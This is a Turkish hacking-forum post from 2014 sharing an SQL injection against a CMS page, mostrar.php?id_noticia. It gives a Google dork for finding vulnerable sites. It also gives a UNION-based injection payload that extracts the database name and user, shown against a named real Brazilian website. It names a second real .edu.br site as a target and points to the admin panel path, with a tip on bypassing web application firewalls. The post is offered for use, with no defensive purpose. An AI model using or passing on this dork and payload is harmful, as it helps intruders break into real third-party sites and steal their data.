Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Sql Injection on CMS
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı: 124
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
Sql Injection on CMS
30.09.2014 22:54
[+} Dork : inurl:"mostrar.php?id_noticia="

[+] Exploit : http://host/mostrar.php?id_noticia=[SQL Injection]

ps:need bypass the WAF protection use sql injection manual.

[+] PoC:

http://www.cbnmogi.com.br/mostrar.php?id...atabase%28
%29,4,user%28%29,6,7,8,9,10--+ <-- example of how to xploit

http://fmg.edu.br/mostrar.php?id_noticia=77'

[+] Admin Page: http://host/admin/
Alinti



1 Ziyaretçi